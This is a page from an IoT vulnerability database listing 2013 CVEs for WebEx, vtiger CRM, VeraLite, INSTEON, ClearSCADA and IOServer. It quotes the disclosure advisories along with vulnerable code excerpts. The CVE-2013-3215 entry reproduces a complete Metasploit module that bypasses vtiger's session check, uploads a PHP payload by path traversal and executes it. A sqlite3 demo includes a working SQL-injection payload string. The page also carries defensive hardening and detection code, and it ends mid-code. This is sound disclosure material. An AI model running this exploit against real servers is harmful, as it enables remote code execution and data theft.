VARIoT IoT vulnerabilities database


VAR-201308-0092 CVE-2013-3448 Cisco WebEx Meetings Server access restriction bypass vulnerability
CVSS V2: 4.0
CVSS V3: -
Severity: MEDIUM
Cisco WebEx Meetings Server does not check whether a user account is active, which allows remote authenticated users to bypass intended access restrictions by performing meeting operations after account deactivation, aka Bug ID CSCuh33315. Cisco WebEx is a web conferencing solution. A user whose account has been deactivated can keep performing meeting operations, bypassing the intended access restrictions; this may aid in further attacks. This issue is tracked by Cisco Bug ID CSCuh33315. Cisco WebEx Meetings Server (CWMS) is the part of Cisco's WebEx conferencing portfolio that combines audio, video and web conferencing.
VAR-202001-0885 CVE-2013-3212 vtiger CRM injection vulnerability

Related entries in the VARIoT exploits database: VAR-E-201308-0074
CVSS V2: 6.8
CVSS V3: 8.1
Severity: HIGH
vtiger CRM 5.4.0 and earlier contain local file-include vulnerabilities in 'customerportal.php' which allow remote attackers to view files and execute local script code. vtiger CRM contains an injection vulnerability: information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. vtiger CRM is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. This may allow the attacker to compromise the application; other attacks are also possible. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management (CRM) system derived from SugarCRM and developed by the US company Vtiger. It provides management, collection and analysis of customer information. The vulnerability stems from the program not properly filtering user-submitted input.

---------------------------------------------------------------------------------
vtiger CRM <= 5.4.0 (customerportal.php) Two Local File Inclusion Vulnerabilities
---------------------------------------------------------------------------------

[-] Software Link:

http://www.vtiger.com/

[-] Affected Versions:

[1] All versions from 5.1.0 to 5.4.0.
[2] All versions from 5.2.0 to 5.4.0.

[-] Vulnerability Description:

1) The vulnerable code is located in the get_list_values SOAP method defined in /soap/customerportal.php:

1528.   function get_list_values($id,$module,$sessionid,$only_mine='true')
1529.   {
1530.           require_once('modules/'.$module.'/'.$module.'.php');
1531.           require_once('include/utils/UserInfoUtil.php');
1532.           global $adb,$log,$current_user;
1533.           $log->debug("Entering customer portal function get_list_values");

2) The vulnerable code is located in the get_project_components SOAP method defined in /soap/customerportal.php:

2778.   function get_project_components($id,$module,$customerid,$sessionid) {
2779.           require_once("modules/$module/$module.php");
2780.           require_once('include/utils/UserInfoUtil.php');
2781.
2782.           global $adb,$log;
2783.           $log->debug("Entering customer portal function get_project_components ..");

The vulnerabilities exist because these methods fail to properly validate input passed through the "module" parameter, that is being used in a call to the require_once() function (lines 1530 and 2779). This might be exploited to include arbitrary local files containing malicious PHP code. Successful exploitation of these vulnerabilities requires the application running on PHP < 5.3.4, because a null byte injection is required.

[-] Solution:

Apply the vendor patch: http://www.vtiger.com/blogs/?p=1467

[-] Disclosure Timeline:

[13/01/2013] - Vendor notified
[06/02/2013] - Vendor asked feedback about http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848
[05/03/2013] - Feedback provided to the vendor
[26/03/2013] - Vendor patch released
[18/04/2013] - CVE number requested
[20/04/2013] - CVE number assigned
[01/08/2013] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3212 to these vulnerabilities.

[-] Credits:

Vulnerabilities discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-05
VAR-202001-0887 CVE-2013-3215 vtiger CRM authentication vulnerability

Related entries in the VARIoT exploits database: VAR-E-201308-0074, VAR-E-201308-0073
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
vtiger CRM 5.4.0 and earlier contain an authentication bypass vulnerability due to improper authentication validation in the validateSession function. vtiger CRM contains an authentication vulnerability: information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. vtiger CRM is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management (CRM) system derived from SugarCRM and developed by the US company Vtiger. It provides management, collection and analysis of customer information.

[-] Vulnerability Description:

The vulnerable code is located in the validateSession() function, which is defined in multiple SOAP services:

function validateSession($username, $sessionid)
{
        global $adb,$current_user;
        $adb->println("Inside function validateSession($username, $sessionid)");

        require_once("modules/Users/Users.php");
        $seed_user = new Users();
        $id = $seed_user->retrieve_user_id($username);

        $server_sessionid = getServerSessionId($id);

        $adb->println("Checking Server session id and customer input session id ==> $server_sessionid == $sessionid");
        if($server_sessionid == $sessionid)
        {
                $adb->println("Session id match. Authenticated to do the current operation.");
                return true;
        }
        else
        {
                $adb->println("Session id does not match. Not authenticated to do the current operation.");
                return false;
        }
}

The vulnerability exists because the "sessionid" parameter isn't properly validated before being compared with the $server_sessionid variable, which is the value returned by the getServerSessionId() function. If called with an invalid session ID, then this function will return "null", in this case the validateSession() will return "true" if the "sessionid" parameter is set to 0, "false", or "null". This can be exploited to bypass the authentication mechanism by calling a SOAP method without providing the "username" and "sessionid" parameters.

[-] Solution:

Apply the vendor patch: http://www.vtiger.com/blogs/?p=1467

[-] Disclosure Timeline:

[13/01/2013] - Vendor notified
[06/02/2013] - Vendor asked feedback about http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848
[05/03/2013] - Feedback provided to the vendor
[26/03/2013] - Vendor patch released
[18/04/2013] - CVE number requested
[20/04/2013] - CVE number assigned
[01/08/2013] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3215 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-08

Metasploit module chaining this authentication bypass with the AddEmailAttachment upload (CVE-2013-3214):

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include REXML
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',
      'Description'    => %q{
          vTiger CRM allows an user to bypass authentication when requesting SOAP
        services. In addition, arbitrary file upload is possible through the
        AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker
        can upload and execute PHP code. This module has been tested successfully on
        vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2.
      },
      'Author'         =>
        [
          'Egidio Romano', # Vulnerability discovery
          'juan vazquez'   # msf module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-3214' ],
          [ 'CVE', '2013-3215' ],
          [ 'OSVDB', '95902' ],
          [ 'OSVDB', '95903' ],
          [ 'BID', '61558' ],
          [ 'BID', '61559' ],
          [ 'EDB', '27279' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          # Arbitrary big number. The payload is sent base64 encoded
          # into a POST SOAP request
          'Space'       => 262144, # 256k
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'vTigerCRM v5.4.0', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2013'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
      ], self.class)
  end

  # A bogus session for a valid user must be refused (nil return); the same
  # call with an empty session must be accepted. That pair is the bypass.
  def check
    test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4)))
    res = send_soap_request(test_one)

    unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/
      return Exploit::CheckCode::Unknown
    end

    test_two = check_email_soap("admin")
    res = send_soap_request(test_two)

    if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    file_name = rand_text_alpha(rand(10)+6) + '.php'
    php = %Q|<?php #{payload.encoded} ?>|

    soap = add_attachment_soap(file_name, php)
    res = send_soap_request(soap)

    print_status("#{peer} - Uploading payload...")
    if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/
      print_good("#{peer} - Payload successfully uploaded")
      register_files_for_cleanup(file_name)
    else
      fail_with(Failure::Unknown, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload...")
    send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
  end

  # The session element is deliberately left empty (see validateSession above)
  # and the filename walks out of the storage directory into the web root.
  def add_attachment_soap(file_name, file_data)
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm'     => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:AddEmailAttachment",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("emailid", {'xsi:type' => 'xsd:string'})
    crm.add_element("filedata", {'xsi:type' => 'xsd:string'})
    crm.add_element("filename", {'xsi:type' => 'xsd:string'})
    crm.add_element("filesize", {'xsi:type' => 'xsd:string'})
    crm.add_element("filetype", {'xsi:type' => 'xsd:string'})
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['emailid'].text = rand_text_alpha(4+rand(4))
    crm.elements['filedata'].text = "MSF_PAYLOAD"
    crm.elements['filename'].text = "MSF_FILENAME"
    crm.elements['filesize'].text = file_data.length.to_s
    crm.elements['filetype'].text = "php"
    crm.elements['username'].text = rand_text_alpha(4+rand(4))

    xml_string = xml.to_s
    xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
    xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")
    return xml_string
  end

  def check_email_soap(user_name = "", session = "")
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm'     => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:CheckEmailPermission",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['username'].text = user_name
    crm.elements['session'].text = session

    xml.to_s
  end

  def send_soap_request(soap_data)
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
      'method' => 'POST',
      'ctype'  => 'text/xml; charset=UTF-8',
      'data'   => soap_data
    })
    return res
  end

end
VAR-202001-1150 CVE-2013-4864 Mi Casa Verde VeraLite Security Bypass Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201308-0135
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to send HTTP requests to intranet servers via the url parameter to cgi-bin/cmh/proxy.sh, related to a Server-Side Request Forgery (SSRF) issue. MiCasaVerde VeraLite contains a server-side request forgery vulnerability: information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. Mi Casa Verde VeraLite is a home gateway controller from Mi Casa Verde (Hong Kong, China); it lets a computer or mobile phone control home appliances attached to the home Wi-Fi network. A security bypass vulnerability exists in Mi Casa Verde VeraLite: by pointing proxy.sh at an internal address, an attacker can bypass specific security restrictions and perform unauthorized operations.
VAR-201912-1592 CVE-2013-4859 INSTEON Hub Inadequate default permissions vulnerability

Related entries in the VARIoT exploits database: VAR-E-201308-0216
CVSS V2: 9.3
CVSS V3: 8.1
Severity: HIGH
INSTEON Hub 2242-222 lacks Web and API authentication. INSTEON Hub contains an improper default permissions vulnerability: information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. The INSTEON Hub lets users control home automation devices over the network. Because the Hub does not properly validate access to its web interface or its API calls, remote attackers can control attached devices and perform other operations without authorization. INSTEON Hub is prone to multiple security-bypass vulnerabilities. An attacker may exploit these issues to bypass certain security restrictions and perform unauthorized actions. INSTEON Hub 2242-222 is vulnerable; other versions may also be affected.
VAR-201309-0480 No CVE ClearSCADA Web Request Handling Remote Denial of Service Vulnerability
CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
ClearSCADA is an integrated SCADA host platform that includes a rotation training engine, real-time database, web server, alarm processor and reporting software. ClearSCADA mishandles certain web requests: a remote attacker can submit a malicious request that triggers an exception and crashes the application. ClearSCADA is prone to a denial-of-service vulnerability; an attacker can exploit this issue to trigger an exception and cause a denial-of-service condition.
VAR-201308-0165 CVE-2013-2790 IOServer master-station DNP3 driver denial-of-service (DoS) vulnerability
CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
The master-station DNP3 driver before driver19.exe, and Beta2041.exe, in IOServer allows remote attackers to cause a denial of service (infinite loop) via crafted DNP3 packets to TCP port 20000. IOServer is a Windows-based OPC server that lets OPC clients such as human-machine interfaces and supervisory control and data acquisition (SCADA) systems exchange plant data with programmable logic controllers. The master-station DNP3 driver does not validate, or does not correctly validate, input received on TCP port 20000, which can affect the program's control flow or data flow: an attacker who submits a specially crafted request can send IOServer into an infinite loop from which it never exits, and a manual restart is required to restore normal operation. Multiple IOServer drivers are prone to this remote denial-of-service vulnerability, which results in a denial-of-service condition.
VAR-201404-0102 CVE-2013-3213 Vtiger CRM SQL injection vulnerability

Related entries in the VARIoT exploits database: VAR-E-201308-0074
CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Multiple SQL injection vulnerabilities in vTiger CRM 5.0.0 through 5.4.0 allow remote attackers to execute arbitrary SQL commands via the (1) picklist_name parameter in the get_picklists method to soap/customerportal.php, (2) where parameter in the get_tickets_list method to soap/customerportal.php, or (3) emailaddress parameter in the SearchContactsByEmail method to soap/vtigerolservice.php; or remote authenticated users to execute arbitrary SQL commands via the (4) emailaddress parameter in the SearchContactsByEmail method to soap/thunderbirdplugin.php. Vtiger CRM contains SQL injection vulnerabilities: a third party may execute SQL commands through the parameters listed above, including the emailaddress parameter of the SearchContactsByEmail method in soap/thunderbirdplugin.php. vtiger CRM is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. vtiger CRM 5.0.0 through 5.4.0 are vulnerable. Vtiger CRM is a customer relationship management (CRM) system derived from SugarCRM and developed by the US company Vtiger. It provides management, collection and analysis of customer information. The vulnerabilities stem from missing input filtering: soap/customerportal.php does not correctly filter the 'picklist_name' parameter of the get_picklists method or the 'where' parameter of the get_tickets_list method; soap/vtigerolservice.php does not correctly filter the 'emailaddress' parameter of the SearchContactsByEmail method; and soap/thunderbirdplugin.php does not correctly filter the 'emailaddress' parameter of its SearchContactsByEmail method.

[-] Vulnerability Description:

1) The vulnerable code is located in the get_picklists SOAP method defined in /soap/customerportal.php:

1177.   $id = $input_array['id'];
1178.   $sessionid = $input_array['sessionid'];
1179.   $picklist_name = $adb->sql_escape_string($input_array['picklist_name']);
1180.
1181.   if(!validateSession($id,$sessionid))
1182.           return null;
1183.
1184.   $picklist_array = Array();
1185.
1186.   $admin_role = 'H2';
1187.   $userid = getPortalUserid();
1188.   $roleres = $adb->pquery("SELECT roleid from vtiger_user2role where userid = ?", array($userid));
1189.   $RowCount = $adb->num_rows($roleres);
1190.   if($RowCount > 0){
1191.           $admin_role = $adb->query_result($roleres,0,'roleid');
1192.   }
1193.
1194.   $res = $adb->pquery("select vtiger_". $picklist_name.".* from vtiger_". $picklist_name." inner join [...]

User input passed through the "picklist_name" parameter seems to be correctly sanitised by the sql_escape_string() method, but the vulnerability exists because it's used in the query at line 1194 without single or double quotes. This can be exploited to conduct blind SQL injection attacks.

2) The vulnerable code is located in the get_tickets_list SOAP method defined in /soap/customerportal.php:

654.    $id = $input_array['id'];
655.    $only_mine = $input_array['onlymine'];
656.    $where = $input_array['where']; //addslashes is already added with where condition fields in portal itself
657.    $match = $input_array['match'];
658.    $sessionid = $input_array['sessionid'];
659.
660.    if(!validateSession($id,$sessionid))
661.            return null;
662.
663.    // Prepare where conditions based on search query
664.    $join_type = '';
665.    $where_conditions = '';
666.    if(trim($where) != '') {
667.            if($match == 'all' || $match == '') {
668.                    $join_type = " AND ";
669.            } elseif($match == 'any') {
670.                    $join_type = " OR ";
671.            }
672.            $where = explode("&&&",$where);
673.            $where_conditions = implode($join_type, $where);

[...]

707.    $query = "SELECT vtiger_troubletickets.*, vtiger_crmentity.smownerid,vtiger_crmentity.createdtime, [...]
708.            FROM vtiger_troubletickets
709.            INNER JOIN vtiger_crmentity ON vtiger_crmentity.crmid = vtiger_troubletickets.ticketid AND [...]
710.            WHERE vtiger_troubletickets.parent_id IN (". generateQuestionMarks($entity_ids_list) .")";
711.    // Add conditions if there are any search parameters
712.    if ($join_type != '' && $where_conditions != '') {
713.            $query .= " AND (".$where_conditions.")";
714.    }

User input passed through the "where" parameter isn't properly validated before being used in a SQL query at line 713. This can be exploited to conduct SQL injection attacks.

3) The vulnerable code is located in the SearchContactsByEmail SOAP method defined in /soap/thunderbirdplugin.php:

186.    function SearchContactsByEmail($username,$password,$emailaddress)
187.    {
188.            if(authentication($username,$password))
189.            {
190.                    require_once('modules/Contacts/Contacts.php');
191.
192.                    $seed_contact = new Contacts();
193.                    $output_list = Array();
194.
195.                    $response = $seed_contact->get_searchbyemailid($username,$emailaddress);

User input passed through the "emailaddress" parameter isn't properly validated before being used in a call to the Contacts::get_searchbyemailid() method at line 195. This can be exploited to conduct SQL injection attacks. Successful exploitation of this vulnerability requires authentication.

4) The vulnerable code is located in the SearchContactsByEmail SOAP method defined in /soap/vtigerolservice.php:

282.    function SearchContactsByEmail($username,$session,$emailaddress)
283.    {
284.            if(!validateSession($username,$session))
285.                    return null;
286.            require_once('modules/Contacts/Contacts.php');
287.
288.            $seed_contact = new Contacts();
289.            $output_list = Array();
290.
291.            $response = $seed_contact->get_searchbyemailid($username,$emailaddress);

User input passed through the "emailaddress" parameter isn't properly validated before being used in a call to the Contacts::get_searchbyemailid() method at line 291. This can be exploited to conduct SQL injection attacks. Successful exploitation of this vulnerability requires knowledge of a valid username.

[-] Solution:

Apply the vendor patch: http://www.vtiger.com/blogs/?p=1467

[-] Disclosure Timeline:

[13/01/2013] - Vendor notified
[06/02/2013] - Vendor asked feedback about http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848
[05/03/2013] - Feedback provided to the vendor
[26/03/2013] - Vendor patch released
[18/04/2013] - CVE number requested
[20/04/2013] - CVE number assigned
[01/08/2013] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3213 to these vulnerabilities.

[-] Credits:

Vulnerabilities discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-06
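The get_picklists and get_tickets_list cases above come down to two different mistakes: an identifier (a table name) that string escaping cannot protect, and a raw SQL fragment accepted from the caller. The Python/sqlite3 model below is an added example, not vtiger code: it rebuilds the line-1194 query shape against a constructed schema, shows a picklist_name that turns the query into a read of a users table even though sql_escape_string() ran on it, and then shows the two safe patterns (an allowlist for the identifier; allowlisted columns with bound values in place of the "where" fragment). The table and column names, the allowlists and the sample rows are assumptions made for the demonstration.

```python
import sqlite3

# Added example (not vtiger code): a sqlite3 model of the get_picklists query at
# line 1194 of soap/customerportal.php, where the escaped-but-unquoted
# picklist_name is spliced in as a table name, plus one safe way to build the
# get_tickets_list "where" condition instead of concatenating a raw fragment.

ALLOWED_PICKLISTS = frozenset({"ticketstatus", "ticketpriorities", "ticketcategories"})
ALLOWED_TICKET_COLUMNS = frozenset({"status", "priority", "category", "title"})


def build_db() -> sqlite3.Connection:
    """Constructed sample schema: a picklist table and a users table whose rows
    the picklist query should never be able to reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE vtiger_ticketstatus (ticketstatusid INTEGER, ticketstatus TEXT);
        INSERT INTO vtiger_ticketstatus VALUES (1, 'Open'), (2, 'Closed');
        CREATE TABLE vtiger_users (id INTEGER, user_name TEXT, user_password TEXT);
        INSERT INTO vtiger_users VALUES (1, 'admin', '$1$ad000000$constructedhash');
        """
    )
    return conn


def sql_escape_string(value: str) -> str:
    """Models a string-escaping helper: it neutralises quote characters, which
    is irrelevant when the value is never placed between quotes."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def get_picklist_vulnerable(conn: sqlite3.Connection, picklist_name: str) -> list:
    """Shape of the line-1194 query: the name is an identifier in two places, so a
    name ending in a comment marker lets the caller rewrite the statement."""
    name = sql_escape_string(picklist_name)
    query = f"select vtiger_{name}.* from vtiger_{name} where 1=1"
    return conn.execute(query).fetchall()


def get_picklist_safe(conn: sqlite3.Connection, picklist_name: str) -> list:
    """Identifiers cannot be bound as parameters, so the only safe option is an
    allowlist of the picklist tables the portal is meant to expose."""
    if picklist_name not in ALLOWED_PICKLISTS:
        raise ValueError(f"unknown picklist: {picklist_name!r}")
    return conn.execute(f"select * from vtiger_{picklist_name}").fetchall()


def build_ticket_filter(conditions: list, match: str) -> tuple:
    """Replacement for the raw "where" fragment of get_tickets_list: the caller
    sends (column, value) pairs; columns are allowlisted, values are bound."""
    join_type = " AND " if match in ("all", "") else " OR " if match == "any" else None
    if join_type is None:
        raise ValueError(f"bad match mode: {match!r}")
    clauses, params = [], []
    for column, value in conditions:
        if column not in ALLOWED_TICKET_COLUMNS:
            raise ValueError(f"unknown column: {column!r}")
        clauses.append(f"vtiger_troubletickets.{column} = ?")
        params.append(value)
    return join_type.join(clauses), params


if __name__ == "__main__":
    db = build_db()
    # The payload has no quote characters, so escaping leaves it untouched; the
    # trailing "--" comments out everything after the first FROM clause.
    payload = "users.* from vtiger_users --"
    print(get_picklist_vulnerable(db, "ticketstatus"))
    print(get_picklist_vulnerable(db, payload))
    try:
        get_picklist_safe(db, payload)
    except ValueError as exc:
        print("rejected:", exc)
    print(build_ticket_filter([("status", "Open"), ("priority", "High")], "all"))
```

The allowlist is the whole fix for the identifier case: there is no quoting or escaping that makes a table name safe to take from the caller, because the database never treats it as data. For the "where" case the portal has to stop accepting SQL text altogether and accept structured conditions instead.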
VAR-202001-0886 CVE-2013-3214 vtiger CRM injection vulnerability

Related entries in the VARIoT exploits database: VAR-E-201308-0074, VAR-E-201308-0073
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerability in 'vtigerolservice.php'. vtiger CRM contains an injection vulnerability: information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management (CRM) system derived from SugarCRM and developed by the US company Vtiger. It provides management, collection and analysis of customer information.

[-] Vulnerability Description:

The vulnerable code is located in the AddEmailAttachment SOAP method defined in /soap/vtigerolservice.php:

458.    function AddEmailAttachment($emailid,$filedata,$filename,$filesize,$filetype,$username,$session)
459.    {
460.            if(!validateSession($username,$session))
461.                    return null;
462.            global $adb;
463.            require_once('modules/Users/Users.php');
464.            require_once('include/utils/utils.php');
465.            $filename = preg_replace('/\s+/', '_', $filename);//replace space with _ in filename
466.            $date_var = date('Y-m-d H:i:s');
467.
468.            $seed_user = new Users();
469.            $user_id = $seed_user->retrieve_user_id($username);
470.
471.            $crmid = $adb->getUniqueID("vtiger_crmentity");
472.
473.            $upload_file_path = decideFilePath();
474.
475.            $handle = fopen($upload_file_path.$crmid."_".$filename,"wb");
476.            fwrite($handle,base64_decode($filedata),$filesize);
477.            fclose($handle);

The vulnerability exists because this method fails to properly validate input passed through the "filedata" and "filename" parameters, which are used to write an "email attachment" in the storage directory (lines 475-477).
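A hardened stand-in for the write at lines 475-477, written in Python as an added example rather than as vtiger's own code. It treats filename, filedata, filesize and filetype as attacker-controlled: the name is reduced to its last path component and checked against an allowlist of extensions (so neither "../../../../../../x.php" nor a dotfile such as .htaccess gets through), the base64 body is decoded strictly and checked against the declared size instead of trusting filesize as a write length, and the final path is verified to stay inside the storage directory. The extension list and the size limit are assumed policy values, not vtiger settings.

```python
import base64
import binascii
import os
import re
import tempfile
from pathlib import Path

# Added example (not vtiger code): a hardened replacement for the attachment
# write in AddEmailAttachment. Every SOAP parameter is treated as hostile.

ALLOWED_TYPES = {"pdf", "txt", "png", "jpg", "csv"}   # assumed policy, not vtiger's
MAX_ATTACHMENT = 10 * 1024 * 1024                     # assumed limit, not vtiger's


class AttachmentRejected(ValueError):
    """Raised for any attachment that fails validation."""


def safe_attachment_name(crmid: int, filename: str) -> str:
    """Keep only the last path component, collapse whitespace as vtiger does,
    and insist on a plain name with an allowlisted extension."""
    if "\x00" in filename:
        raise AttachmentRejected("NUL byte in filename")
    leaf = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any directory part
    leaf = re.sub(r"\s+", "_", leaf)
    if leaf in ("", ".", "..") or leaf.startswith("."):     # no empty names, no dotfiles
        raise AttachmentRejected(f"bad filename {filename!r}")
    if not re.fullmatch(r"[A-Za-z0-9._-]{1,128}", leaf):
        raise AttachmentRejected(f"disallowed characters in {filename!r}")
    ext = leaf.rsplit(".", 1)[-1].lower() if "." in leaf else ""
    if ext not in ALLOWED_TYPES:
        raise AttachmentRejected(f"extension {ext!r} not allowed")
    return f"{crmid}_{leaf}"


def encode_for_soap(data: bytes) -> str:
    """What a legitimate client puts in the filedata element."""
    return base64.b64encode(data).decode("ascii")


def decode_attachment(filedata: str, filesize: str) -> bytes:
    """Strictly decode the base64 body and reconcile it with the declared size."""
    try:
        raw = base64.b64decode(filedata, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise AttachmentRejected(f"filedata is not base64: {exc}")
    if not filesize.isdigit() or int(filesize) != len(raw):
        raise AttachmentRejected("filesize does not match decoded data")
    if len(raw) > MAX_ATTACHMENT:
        raise AttachmentRejected("attachment too large")
    return raw


def store_attachment(storage_dir: str, crmid: int, filename: str,
                     filedata: str, filesize: str) -> str:
    """Resolve the final path, refuse anything outside storage_dir, then write."""
    base = Path(storage_dir).resolve()
    target = (base / safe_attachment_name(crmid, filename)).resolve()
    if target.parent != base:
        raise AttachmentRejected("path escapes storage directory")
    payload = decode_attachment(filedata, filesize)
    base.mkdir(parents=True, exist_ok=True)
    with open(target, "wb") as fh:
        fh.write(payload)
    return str(target)


def demo_store() -> tuple:
    """Write one constructed attachment into a fresh temp dir and read it back."""
    storage = tempfile.mkdtemp(prefix="vtiger_storage_")
    body = b"constructed attachment body"
    path = store_attachment(storage, 42, "Q3 report.pdf", encode_for_soap(body), str(len(body)))
    with open(path, "rb") as fh:
        return os.path.basename(path), fh.read() == body


if __name__ == "__main__":
    print(demo_store())
    for bad in ("../../../../../../qmxrtz.php", ".htaccess", "shell.php"):
        try:
            safe_attachment_name(1, bad)
        except AttachmentRejected as exc:
            print("rejected:", exc)
```

Note that the vendor patch described under Solution below still leaves authenticated users able to upload executable content; an extension allowlist applied server-side, as above, is what closes that, independently of the session check.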
[-] Solution:

The patch provided by the vendor (http://www.vtiger.com/blogs/?p=1467) doesn't completely fix this vulnerability, because a remote authenticated user can still inject and execute arbitrary code.

[*] The vendor was alerted about this when the feedback has been provided.

[-] Disclosure Timeline:

[13/01/2013] - Vendor notified
[06/02/2013] - Vendor asked feedback about http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848
[05/03/2013] - Feedback provided to the vendor [*]
[26/03/2013] - Vendor patch released
[18/04/2013] - CVE number requested
[20/04/2013] - CVE number assigned
[01/08/2013] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3214 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-07

The Metasploit module 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload' (references CVE-2013-3214, CVE-2013-3215, KIS-2013-07 and KIS-2013-08; tested on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2) chains this upload with the validateSession() authentication bypass. It is the same module reproduced in full under VAR-202001-0887 (CVE-2013-3215) above and is not repeated here.
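For detection, the three vtiger advisories on this page share one traffic shape: SOAP POSTs to soap/vtigerolservice.php or soap/customerportal.php carrying an empty (or absent) session, a traversal or PHP filename in AddEmailAttachment (this entry and the Metasploit module under VAR-202001-0887), or a non-alphanumeric module value in get_list_values/get_project_components (VAR-202001-0885). The Python below is an added example, not vtiger or Metasploit code; it parses captured request bodies and returns findings per request. The captures are constructed to match those shapes and are not real traffic, and the list of PHP extensions is an assumption.

```python
import re
import xml.etree.ElementTree as ET

# Added example (not vtiger or Metasploit code): inspect captured POST bodies to
# the vtiger SOAP endpoints and flag the request shapes the advisories describe.

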